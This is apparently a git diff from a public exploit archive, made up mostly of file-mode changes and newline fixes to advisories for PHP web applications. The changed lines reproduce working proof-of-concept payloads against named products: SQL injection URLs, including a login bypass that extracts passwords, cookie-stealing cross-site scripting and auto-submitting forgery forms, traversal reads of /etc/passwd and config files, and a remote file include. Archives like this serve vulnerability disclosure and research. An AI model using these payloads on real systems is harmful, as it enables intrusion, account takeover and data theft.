a/platforms/php/webapps/34769.txt b/platforms/php/webapps/34769.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3477.htm b/platforms/php/webapps/3477.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34770.txt b/platforms/php/webapps/34770.txt old mode 100755 new mode 100644 index ea9f26d9d..194d5c2c3 --- a/platforms/php/webapps/34770.txt +++ b/platforms/php/webapps/34770.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to compromise the application, access or m http://www.example.com/hangman/index.php?letters=A&n=1%20and%201=1+AND%20SUBSTRING(@@version,1,1)=5 TRUE http://www.example.com/hangman/index.php?letters=A&n=1%20and%201=1+AND%20SUBSTRING(@@version,1,1)=4 FALSE -http://www.example.com/hangman/index.php?letters=A&n=1%20and%201=1+union+select+1,version()-- \ No newline at end of file +http://www.example.com/hangman/index.php?letters=A&n=1%20and%201=1+union+select+1,version()-- \ No newline at end of file diff --git a/platforms/php/webapps/34771.txt b/platforms/php/webapps/34771.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34772.txt b/platforms/php/webapps/34772.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34773.txt b/platforms/php/webapps/34773.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34774.txt b/platforms/php/webapps/34774.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34775.txt b/platforms/php/webapps/34775.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34776.txt b/platforms/php/webapps/34776.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3478.htm b/platforms/php/webapps/3478.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34781.txt b/platforms/php/webapps/34781.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34782.txt b/platforms/php/webapps/34782.txt old mode 100755 new mode 100644 index 60c91be2c..ef22c5bcf --- a/platforms/php/webapps/34782.txt +++ b/platforms/php/webapps/34782.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Car Portal 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/autoportal10/index.php?page=en_Home&car=[SQL Injection] \ No newline at end of file +http://www.example.com/autoportal10/index.php?page=en_Home&car=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/34783.txt b/platforms/php/webapps/34783.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34784.txt b/platforms/php/webapps/34784.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34785.txt b/platforms/php/webapps/34785.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34786.txt b/platforms/php/webapps/34786.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34787.txt b/platforms/php/webapps/34787.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34788.txt b/platforms/php/webapps/34788.txt old mode 100755 new mode 100644 index 41c108b61..220124a82 --- a/platforms/php/webapps/34788.txt +++ b/platforms/php/webapps/34788.txt @@ -8,4 +8,4 @@ The attacker may leverage the cross-site scripting issue to execute arbitrary sc MODx 2.0.2-pl is vulnerable; other versions may also be affected. -http://www.example.com/modx/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 \ No newline at end of file +http://www.example.com/modx/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 \ No newline at end of file diff --git a/platforms/php/webapps/34789.html b/platforms/php/webapps/34789.html old mode 100755 new mode 100644 index e0820771c..f112fd62d --- a/platforms/php/webapps/34789.html +++ b/platforms/php/webapps/34789.html @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow GetSimple CMS 2.01 is vulnerable; prior versions may also be affected. -<form action="http://host/admin/changedata.php" method="post" name="main" > <input type="hidden" name="post-title" value='page title"><script>alert(document.cookie)</script>' /> <input type="hidden" name="post-id" value="test" /> <input type="hidden" name="post-metak" value="" /> <input type="hidden" name="post-metad" value="" /> <input type="hidden" name="post-parent" value="" /> <input type="hidden" name="post-template" value="template.php" /> <input type="hidden" name="post-menu" value="test" /> <input type="hidden" name="post-menu-order" value="" /> <input type="hidden" name="post-content" value="page html" /> <input type="hidden" name="existing-url" value="test" /> <input type="hidden" name="submitted" value="Save Updates" /> </form> <script> document.main.submit(); </script> \ No newline at end of file +<form action="http://host/admin/changedata.php" method="post" name="main" > <input type="hidden" name="post-title" value='page title"><script>alert(document.cookie)</script>' /> <input type="hidden" name="post-id" value="test" /> <input type="hidden" name="post-metak" value="" /> <input type="hidden" name="post-metad" value="" /> <input type="hidden" name="post-parent" value="" /> <input type="hidden" name="post-template" value="template.php" /> <input type="hidden" name="post-menu" value="test" /> <input type="hidden" name="post-menu-order" value="" /> <input type="hidden" name="post-content" value="page html" /> <input type="hidden" name="existing-url" value="test" /> <input type="hidden" name="submitted" value="Save Updates" /> </form> <script> document.main.submit(); </script> \ No newline at end of file diff --git a/platforms/php/webapps/34790.txt b/platforms/php/webapps/34790.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34791.txt b/platforms/php/webapps/34791.txt old mode 100755 new mode 100644 index 295f6787e..420b7cd61 --- a/platforms/php/webapps/34791.txt +++ b/platforms/php/webapps/34791.txt @@ -4,4 +4,4 @@ Swinger Club Portal is prone to an SQL-injection vulnerability and a remote file An attacker can exploit these vulnerabilities to access or modify data, exploit latent vulnerabilities in the underlying database, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. -http://www.example.com/anzeiger/start.php?go=rubrik&id=[SQL] \ No newline at end of file +http://www.example.com/anzeiger/start.php?go=rubrik&id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/34792.txt b/platforms/php/webapps/34792.txt old mode 100755 new mode 100644 index 2f23092c6..1f043c5fa --- a/platforms/php/webapps/34792.txt +++ b/platforms/php/webapps/34792.txt @@ -4,4 +4,4 @@ Swinger Club Portal is prone to an SQL-injection vulnerability and a remote file An attacker can exploit these vulnerabilities to access or modify data, exploit latent vulnerabilities in the underlying database, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. -http://www.example.com/anzeiger/start.php?go=[RFI] \ No newline at end of file +http://www.example.com/anzeiger/start.php?go=[RFI] \ No newline at end of file diff --git a/platforms/php/webapps/34793.txt b/platforms/php/webapps/34793.txt old mode 100755 new mode 100644 index aad6b5c7c..fe3e53d33 --- a/platforms/php/webapps/34793.txt +++ b/platforms/php/webapps/34793.txt @@ -4,4 +4,4 @@ Top Paidmailer is prone to a remote file-include vulnerability because it fails An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. -http://www.example.com/patch/home.php?page=[rfi] \ No newline at end of file +http://www.example.com/patch/home.php?page=[rfi] \ No newline at end of file diff --git a/platforms/php/webapps/34795.txt b/platforms/php/webapps/34795.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34797.txt b/platforms/php/webapps/34797.txt old mode 100755 new mode 100644 index a2217b1c3..4d05153ee --- a/platforms/php/webapps/34797.txt +++ b/platforms/php/webapps/34797.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow The issue affects version 4.3e; other versions may also be affected. -http://www.example.com/surgeweb?username_ex="/><scri<script>alert(document.cookie);</script><input type="hidden \ No newline at end of file +http://www.example.com/surgeweb?username_ex="/><scri<script>alert(document.cookie);</script><input type="hidden \ No newline at end of file diff --git a/platforms/php/webapps/34798.txt b/platforms/php/webapps/34798.txt old mode 100755 new mode 100644 index 710671497..843cf69ad --- a/platforms/php/webapps/34798.txt +++ b/platforms/php/webapps/34798.txt @@ -5,4 +5,4 @@ ITS SCADA is prone to an SQL-injection vulnerability. Exploiting this issue can allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. User ID = 1' or 1=(select top 1 password from Users)-- -Password = blank \ No newline at end of file +Password = blank \ No newline at end of file diff --git a/platforms/php/webapps/34800.txt b/platforms/php/webapps/34800.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34803.txt b/platforms/php/webapps/34803.txt old mode 100755 new mode 100644 index 77aada3de..3ff7ccbba --- a/platforms/php/webapps/34803.txt +++ b/platforms/php/webapps/34803.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Online Guestbook Pro 5.1 is vulnerable; other versions may also be affected. -http://www.example.com/patch/ogp_show.php?display=[nm]&sort=&entry=[XSS]&search=&search_choice== \ No newline at end of file +http://www.example.com/patch/ogp_show.php?display=[nm]&sort=&entry=[XSS]&search=&search_choice== \ No newline at end of file diff --git a/platforms/php/webapps/34804.txt b/platforms/php/webapps/34804.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34805.txt b/platforms/php/webapps/34805.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34806.txt b/platforms/php/webapps/34806.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34807.txt b/platforms/php/webapps/34807.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34808.txt b/platforms/php/webapps/34808.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34809.txt b/platforms/php/webapps/34809.txt old mode 100755 new mode 100644 index 9abb95ac9..43c3d74a2 --- a/platforms/php/webapps/34809.txt +++ b/platforms/php/webapps/34809.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a Tausch Ticket Script 3 is vulnerable; other versions may also be affected. -http://www.example.com/suchauftraege_user.php?userid=[SQL] \ No newline at end of file +http://www.example.com/suchauftraege_user.php?userid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/34810.txt b/platforms/php/webapps/34810.txt old mode 100755 new mode 100644 index e0305fff3..5676c54a1 --- a/platforms/php/webapps/34810.txt +++ b/platforms/php/webapps/34810.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a Tausch Ticket Script 3 is vulnerable; other versions may also be affected. -http://www.example.com/vote.php?descr=[SQL] \ No newline at end of file +http://www.example.com/vote.php?descr=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/34811.txt b/platforms/php/webapps/34811.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34812.html b/platforms/php/webapps/34812.html old mode 100755 new mode 100644 index 9bf78c92d..400d0c7aa --- a/platforms/php/webapps/34812.html +++ b/platforms/php/webapps/34812.html @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Docebo 3.6.0.4 is vulnerable; prior versions may also be affected. -<form action="http://www.example.com/doceboLms/index.php?modname=advice&op=upadvice" method="post" name="main" > <input type="hidden" name="idAdvice" value="2" /> <input type="hidden" name="title" value="Hello" /> <input type="hidden" name="description" value='1"><script>alert(document.cookie)</script>' /> <input type="hidden" name="addadvice" value="Save changes" /> </form> <script> document.main.submit(); </script> \ No newline at end of file +<form action="http://www.example.com/doceboLms/index.php?modname=advice&op=upadvice" method="post" name="main" > <input type="hidden" name="idAdvice" value="2" /> <input type="hidden" name="title" value="Hello" /> <input type="hidden" name="description" value='1"><script>alert(document.cookie)</script>' /> <input type="hidden" name="addadvice" value="Save changes" /> </form> <script> document.main.submit(); </script> \ No newline at end of file diff --git a/platforms/php/webapps/34813.txt b/platforms/php/webapps/34813.txt old mode 100755 new mode 100644 index f86901192..8e714ecd4 --- a/platforms/php/webapps/34813.txt +++ b/platforms/php/webapps/34813.txt @@ -6,4 +6,4 @@ Exploiting these vulnerabilities could allow an attacker to steal cookie-based a Elxis 2009.2 electra rev2631 is vulnerable; other versions may be affected. -http://www.example.com/administrator/index2.php?option=com_content&sectionid=0&task=edit&hidemainmenu=1&id=999'+UNION+SELECT+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+c \ No newline at end of file +http://www.example.com/administrator/index2.php?option=com_content&sectionid=0&task=edit&hidemainmenu=1&id=999'+UNION+SELECT+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+c \ No newline at end of file diff --git a/platforms/php/webapps/34814.txt b/platforms/php/webapps/34814.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34818.html b/platforms/php/webapps/34818.html old mode 100755 new mode 100644 index f3e92dfba..ebe0c697c --- a/platforms/php/webapps/34818.html +++ b/platforms/php/webapps/34818.html @@ -39,6 +39,4 @@ method="POST"> </form> </body> </div> -</html> - - \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/php/webapps/34824.txt b/platforms/php/webapps/34824.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34825.html b/platforms/php/webapps/34825.html old mode 100755 new mode 100644 index cc7497a4a..2e8665b38 --- a/platforms/php/webapps/34825.html +++ b/platforms/php/webapps/34825.html @@ -8,4 +8,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in Elgg 1.0 is vulnerable; other versions may also be affected. -<body onload="document.forms.g.submit();"> <iframe name="my_frame" ALING="BOTTOM" scrolling=no width=1 heigth=1></iframe> <form method="POST" target="my_frame" action="http://www.example.com/_userdetails/index.php" name="g" id="g"> <input type=hidden name="name" value=""> <input type=hidden name="email" value=""> <input type=hidden name="moderation" value="no"> <input type=hidden name="publiccoments" value="no"> <input type=hidden name="receivenotifications" value="no"> <input type=hidden name="password1" value="password"> <------ Eye with this <input type=hidden name="password2" value="password"> <------ Eye with this <input type=hidden name="flag[commentwall_access]" value="LOGGED_IN"> <input type=hidden name="lang" value=""> <input type=hidden name="flag[sidebarsidebar-profile]" value="yes"> <input type=hidden name="flag[sidebarsidebar-communities]" value="yes"> <input type=hidden name="flag[sidebarsidebar-blog]" value="yes"> <input type=hidden name="flag[sidebarsidebar-friends]" value="yes"> <input type=hidden name="visualeditor" value="yes"> <input type=hidden name="action" value="userdetails:update"> <input type=hidden name="id" value="id_victima"> <---------Eye with this <input type=hidden name="profile_id" value="id_victima"> <---------Eye with this </form> \ No newline at end of file +<body onload="document.forms.g.submit();"> <iframe name="my_frame" ALING="BOTTOM" scrolling=no width=1 heigth=1></iframe> <form method="POST" target="my_frame" action="http://www.example.com/_userdetails/index.php" name="g" id="g"> <input type=hidden name="name" value=""> <input type=hidden name="email" value=""> <input type=hidden name="moderation" value="no"> <input type=hidden name="publiccoments" value="no"> <input type=hidden name="receivenotifications" value="no"> <input type=hidden name="password1" value="password"> <------ Eye with this <input type=hidden name="password2" value="password"> <------ Eye with this <input type=hidden name="flag[commentwall_access]" value="LOGGED_IN"> <input type=hidden name="lang" value=""> <input type=hidden name="flag[sidebarsidebar-profile]" value="yes"> <input type=hidden name="flag[sidebarsidebar-communities]" value="yes"> <input type=hidden name="flag[sidebarsidebar-blog]" value="yes"> <input type=hidden name="flag[sidebarsidebar-friends]" value="yes"> <input type=hidden name="visualeditor" value="yes"> <input type=hidden name="action" value="userdetails:update"> <input type=hidden name="id" value="id_victima"> <---------Eye with this <input type=hidden name="profile_id" value="id_victima"> <---------Eye with this </form> \ No newline at end of file diff --git a/platforms/php/webapps/34826.html b/platforms/php/webapps/34826.html old mode 100755 new mode 100644 index 4a0191a46..fd5bec5df --- a/platforms/php/webapps/34826.html +++ b/platforms/php/webapps/34826.html @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow OverLook 5.0 is vulnerable; prior versions may also be affected. -<!-- -*-*- ANATOLIA SECURITY (c) 2010 -*-*- $ Title: Proof of Concept Code for OverLook v5 Cross-site Scripting Vuln. $ ADV-ID: 2010-002 $ ADV-URL: http://www.anatoliasecurity.com/adv/as-adv-2010-002.txt $ Technical Details: http://www.anatoliasecurity.com/advisories/overlook-xss * PoC created by Eliteman ~ mail: eliteman [~AT~] anatoliasecurity [~DOT~] com ~ web: elite.anatoliasecurity.com --> <html> <head> <title> OverLook v5.0 Cross-site Scripting </title> </head> <body> <form action="http://target/overlook/title.php" method="get"> <input type="hidden" name="frame" value=""><script>alert(/1337/)</script><--"> </form> <script type="text/javascript"> document.forms[0].submit(); </script> </body> </html> \ No newline at end of file +<!-- -*-*- ANATOLIA SECURITY (c) 2010 -*-*- $ Title: Proof of Concept Code for OverLook v5 Cross-site Scripting Vuln. $ ADV-ID: 2010-002 $ ADV-URL: http://www.anatoliasecurity.com/adv/as-adv-2010-002.txt $ Technical Details: http://www.anatoliasecurity.com/advisories/overlook-xss * PoC created by Eliteman ~ mail: eliteman [~AT~] anatoliasecurity [~DOT~] com ~ web: elite.anatoliasecurity.com --> <html> <head> <title> OverLook v5.0 Cross-site Scripting </title> </head> <body> <form action="http://target/overlook/title.php" method="get"> <input type="hidden" name="frame" value=""><script>alert(/1337/)</script><--"> </form> <script type="text/javascript"> document.forms[0].submit(); </script> </body> </html> \ No newline at end of file diff --git a/platforms/php/webapps/34827.txt b/platforms/php/webapps/34827.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34828.txt b/platforms/php/webapps/34828.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34833.txt b/platforms/php/webapps/34833.txt old mode 100755 new mode 100644 index 90133c097..b960811a1 --- a/platforms/php/webapps/34833.txt +++ b/platforms/php/webapps/34833.txt @@ -4,4 +4,4 @@ The 'com_trade' component for Joomla! and Mambo is prone to a cross-site scripti Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/index.php?option=com_trade&task=product_info&Itemid=florix&PID=[XSS] \ No newline at end of file +http://www.example.com/index.php?option=com_trade&task=product_info&Itemid=florix&PID=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34837.txt b/platforms/php/webapps/34837.txt old mode 100755 new mode 100644 index 7296b4e24..5d6a01f90 --- a/platforms/php/webapps/34837.txt +++ b/platforms/php/webapps/34837.txt @@ -4,4 +4,4 @@ The 'com_jstore' component for Joomla! is prone to a local file-include vulnerab An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. -http://www.example.com/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/3484.txt b/platforms/php/webapps/3484.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34840.txt b/platforms/php/webapps/34840.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34841.txt b/platforms/php/webapps/34841.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34842.txt b/platforms/php/webapps/34842.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34843.txt b/platforms/php/webapps/34843.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34845.txt b/platforms/php/webapps/34845.txt old mode 100755 new mode 100644 index 6f6161626..e99378f17 --- a/platforms/php/webapps/34845.txt +++ b/platforms/php/webapps/34845.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow PHP Photo Vote 1.3F is vulnerable; other versions may also be affected. -http://www.example.com/demo/photovote/login.php?page="><script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/demo/photovote/login.php?page="><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/34847.txt b/platforms/php/webapps/34847.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34849.txt b/platforms/php/webapps/34849.txt old mode 100755 new mode 100644 index 795d2410a..d91f8beec --- a/platforms/php/webapps/34849.txt +++ b/platforms/php/webapps/34849.txt @@ -8,4 +8,4 @@ AdvertisementManager 3.1.0 is vulnerable; other versions may also be affected. http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=../../../../../../../../boot.ini%00 -http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=http://www.example.com/c.txt? \ No newline at end of file +http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=http://www.example.com/c.txt? \ No newline at end of file diff --git a/platforms/php/webapps/3485.txt b/platforms/php/webapps/3485.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34850.txt b/platforms/php/webapps/34850.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34851.txt b/platforms/php/webapps/34851.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34854.txt b/platforms/php/webapps/34854.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34858.txt b/platforms/php/webapps/34858.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3486.txt b/platforms/php/webapps/3486.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34861.txt b/platforms/php/webapps/34861.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34863.txt b/platforms/php/webapps/34863.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34871.txt b/platforms/php/webapps/34871.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34873.txt b/platforms/php/webapps/34873.txt old mode 100755 new mode 100644 index 36d7f9921..84050b946 --- a/platforms/php/webapps/34873.txt +++ b/platforms/php/webapps/34873.txt @@ -8,4 +8,4 @@ Versions prior to Wap-motor 18.1 are vulnerable. http://www.example.com/gallery/gallery.php?image=%00../profil/Twost.prof%00.gif http://www.example.com/gallery/gallery.php?image=%00../../template/config.php%00.gif -http://www.example.com/gallery/gallery.php?image=%00../datatmp/adminlist.dat%00.gif \ No newline at end of file +http://www.example.com/gallery/gallery.php?image=%00../datatmp/adminlist.dat%00.gif \ No newline at end of file diff --git a/platforms/php/webapps/34874.txt b/platforms/php/webapps/34874.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34875.txt b/platforms/php/webapps/34875.txt old mode 100755 new mode 100644 index 6046b3257..67db89430 --- a/platforms/php/webapps/34875.txt +++ b/platforms/php/webapps/34875.txt @@ -4,4 +4,4 @@ QuarkMail is prone to a directory-traversal vulnerability because it fails to su Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. -http://www.example.com/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../ etc/passwd%00&id=2&sort=0&read_flag=yes \ No newline at end of file +http://www.example.com/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../ etc/passwd%00&id=2&sort=0&read_flag=yes \ No newline at end of file diff --git a/platforms/php/webapps/34876.txt b/platforms/php/webapps/34876.txt old mode 100755 new mode 100644 index 8d582a936..9a5e740eb --- a/platforms/php/webapps/34876.txt +++ b/platforms/php/webapps/34876.txt @@ -5,4 +5,4 @@ E-Gold Game Series: Pirates of The Caribbean is prone to multiple SQL-injection Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/demo/caribbean/?y=1 and 1=1&x=1 TRUE -http://www.example.com/demo/caribbean/?y=1 and 1=2&x=1 FALSE \ No newline at end of file +http://www.example.com/demo/caribbean/?y=1 and 1=2&x=1 FALSE \ No newline at end of file diff --git a/platforms/php/webapps/34877.txt b/platforms/php/webapps/34877.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34878.txt b/platforms/php/webapps/34878.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34882.html b/platforms/php/webapps/34882.html old mode 100755 new mode 100644 index e3ff942a8..123418215 --- a/platforms/php/webapps/34882.html +++ b/platforms/php/webapps/34882.html @@ -6,4 +6,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in sNews 1.7 is vulnerable; other versions may also be affected. -<form action="http://www.example.com/?action=process&task=save_settings" method="post" name="main" > <input type="hidden" name="website_title" value='sNews 1.7"><script>alert(document.cookie)</script>'> <input type="hidden" name="home_sef" value="home"> <input type="hidden" name="website_description" value="sNews CMS"> <input type="hidden" name="website_keywords" value="snews"> <input type="hidden" name="website_email" value="info@mydomain.com"> <input type="hidden" name="contact_subject" value="Contact Form"> <input type="hidden" name="language" value="EN"> <input type="hidden" name="charset" value="UTF-8"> <input type="hidden" name="date_format" value="d.m.Y.+H:i"> <input type="hidden" name="article_limit" value="3"> <input type="hidden" name="rss_limit" value="5"> <input type="hidden" name="display_page" value="0"> <input type="hidden" name="num_categories" value="on"> <input type="hidden" name="file_ext" value="phps,php,txt,inc,htm,html"> <input type="hidden" name="allowed_file" value="php,htm,html,txt,inc,css,js,swf"> <input type="hidden" name="allowed_img" value="gif,jpg,jpeg,png"> <input type="hidden" name="comment_repost_timer" value="20"> <input type="hidden" name="comments_order" value="ASC"> <input type="hidden" name="comment_limit" value="30"> <input type="hidden" name="word_filter_file" value=""> <input type="hidden" name="word_filter_change" value=""> <input type="hidden" name="save" value="Save"> </form> <script> document.main.submit(); </script> <form action="http://www.example.com/?action=process&task=admin_article&id=2" method="post" name="main" > <input type="hidden" name="title" value="article title" /> <input type="hidden" name="seftitle" value="sefurl" /> <input type="hidden" name="text" value='article text"><script>alert(document.cookie)</script>' /> <input type="hidden" name="define_category" value="1" /> <input type="hidden" name="publish_article" value="on" /> <input type="hidden" name="position" value="1" /> <input type="hidden" name="description_meta" value="desc" /> <input type="hidden" name="keywords_meta" value="key" /> <input type="hidden" name="display_title" value="on" /> <input type="hidden" name="display_info" value="on" /> <input type="hidden" name="fposting_day" value="29" /> <input type="hidden" name="fposting_month" value="9" /> <input type="hidden" name="fposting_year" value="2010" /> <input type="hidden" name="fposting_hour" value="16" /> <input type="hidden" name="fposting_minute" value="40" /> <input type="hidden" name="task" value="admin_article" /> <input type="hidden" name="edit_article" value="Edit" /> <input type="hidden" name="article_category" value="1" /> <input type="hidden" name="id" value="2" /> </form> <script> document.main.submit(); </script> \ No newline at end of file +<form action="http://www.example.com/?action=process&task=save_settings" method="post" name="main" > <input type="hidden" name="website_title" value='sNews 1.7"><script>alert(document.cookie)</script>'> <input type="hidden" name="home_sef" value="home"> <input type="hidden" name="website_description" value="sNews CMS"> <input type="hidden" name="website_keywords" value="snews"> <input type="hidden" name="website_email" value="info@mydomain.com"> <input type="hidden" name="contact_subject" value="Contact Form"> <input type="hidden" name="language" value="EN"> <input type="hidden" name="charset" value="UTF-8"> <input type="hidden" name="date_format" value="d.m.Y.+H:i"> <input type="hidden" name="article_limit" value="3"> <input type="hidden" name="rss_limit" value="5"> <input type="hidden" name="display_page" value="0"> <input type="hidden" name="num_categories" value="on"> <input type="hidden" name="file_ext" value="phps,php,txt,inc,htm,html"> <input type="hidden" name="allowed_file" value="php,htm,html,txt,inc,css,js,swf"> <input type="hidden" name="allowed_img" value="gif,jpg,jpeg,png"> <input type="hidden" name="comment_repost_timer" value="20"> <input type="hidden" name="comments_order" value="ASC"> <input type="hidden" name="comment_limit" value="30"> <input type="hidden" name="word_filter_file" value=""> <input type="hidden" name="word_filter_change" value=""> <input type="hidden" name="save" value="Save"> </form> <script> document.main.submit(); </script> <form action="http://www.example.com/?action=process&task=admin_article&id=2" method="post" name="main" > <input type="hidden" name="title" value="article title" /> <input type="hidden" name="seftitle" value="sefurl" /> <input type="hidden" name="text" value='article text"><script>alert(document.cookie)</script>' /> <input type="hidden" name="define_category" value="1" /> <input type="hidden" name="publish_article" value="on" /> <input type="hidden" name="position" value="1" /> <input type="hidden" name="description_meta" value="desc" /> <input type="hidden" name="keywords_meta" value="key" /> <input type="hidden" name="display_title" value="on" /> <input type="hidden" name="display_info" value="on" /> <input type="hidden" name="fposting_day" value="29" /> <input type="hidden" name="fposting_month" value="9" /> <input type="hidden" name="fposting_year" value="2010" /> <input type="hidden" name="fposting_hour" value="16" /> <input type="hidden" name="fposting_minute" value="40" /> <input type="hidden" name="task" value="admin_article" /> <input type="hidden" name="edit_article" value="Edit" /> <input type="hidden" name="article_category" value="1" /> <input type="hidden" name="id" value="2" /> </form> <script> document.main.submit(); </script> \ No newline at end of file diff --git a/platforms/php/webapps/34883.txt b/platforms/php/webapps/34883.txt old mode 100755 new mode 100644 index f0e32a1b6..0ef55be92 --- a/platforms/php/webapps/34883.txt +++ b/platforms/php/webapps/34883.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to carry out unauthorized actions on the unde 4Site CMS 2.6 is vulnerable; other versions may also be affected. -http://www.example.com/catalog/index.shtml?cat=-1+UNION+SELECT+@@version \ No newline at end of file +http://www.example.com/catalog/index.shtml?cat=-1+UNION+SELECT+@@version \ No newline at end of file diff --git a/platforms/php/webapps/34884.txt b/platforms/php/webapps/34884.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34885.txt b/platforms/php/webapps/34885.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34886.txt b/platforms/php/webapps/34886.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34887.txt b/platforms/php/webapps/34887.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34888.txt b/platforms/php/webapps/34888.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3489.txt b/platforms/php/webapps/3489.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34890.txt b/platforms/php/webapps/34890.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34891.txt b/platforms/php/webapps/34891.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34892.txt b/platforms/php/webapps/34892.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34893.txt 